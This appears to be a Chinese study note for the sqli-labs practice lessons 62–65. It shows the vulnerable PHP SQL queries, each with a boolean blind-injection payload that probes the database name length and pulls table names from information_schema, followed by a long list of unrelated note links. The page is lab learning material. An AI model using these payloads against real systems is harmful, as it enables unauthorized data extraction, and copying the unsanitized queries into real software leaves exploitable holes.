//8EhMs3hgKrmAcsmlJn4wVrSh

六十二盲注
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
1') and length(database())=10 %23
challenges
1') and ascii(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1))<101%23

六十三盲注
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
1' and length(database())=10 %23

六十四盲注
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
1)) and length(database())=10 %23

六十五盲注
$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
1") and length(database())=10 %23

印象筆記 --- 方法分享筆記
2018-11-22
筆記
筆記
2020-12-28
筆記
CUUG筆記 ORACLE索引學習筆記
2014-01-07
筆記Oracle索引
主動筆記與被動筆記
2015-04-12
筆記
淘寶記錄筆記
2024-04-18
筆記
心情筆記
2020-04-04
筆記
命令筆記
2019-12-02
筆記
筆記：Docker
2019-02-26
筆記Docker
Meteor筆記
2019-03-01
筆記
ES筆記
2019-04-03
筆記
AbstractQueuedSynchronizer筆記
2019-04-02
筆記
Redis筆記
2019-03-24
Redis筆記
new筆記
2019-07-14
筆記
vio筆記
2019-04-21
筆記
Liunx筆記
2019-04-10
筆記
Nacos 筆記
2021-08-12
筆記
oracle筆記
2021-08-30
Oracle筆記
html 筆記
2019-02-16
HTML筆記
Cookie筆記
2018-08-18
Cookie筆記
jQuery筆記
2018-08-13
jQuery筆記
docker 筆記
2018-11-16
Docker筆記
Restful 筆記
2018-09-25
REST筆記
kafka 筆記
2019-01-09
Kafka筆記
路由筆記
2019-01-07
路由筆記
webSocket筆記
2019-01-21
Web筆記
筆記1
2018-12-09
筆記
筆記-FMDB
2018-12-08
筆記
Scrum筆記
2018-11-01
Scrum筆記
canvas筆記
2018-07-26
Canvas筆記
小馬筆記
2018-08-06
筆記
隨筆記
2018-08-06
筆記
spark筆記
2020-11-20
Spark筆記
mysql 筆記
2020-11-10
MySql筆記
筆記：JVM
2020-11-10
筆記JVM
Servlet筆記
2020-11-17
Servlet筆記
夢筆記
2020-12-03
筆記
GIF筆記
2020-11-29
筆記
shell 筆記
2020-11-29
筆記

sqli-less 筆記

相關文章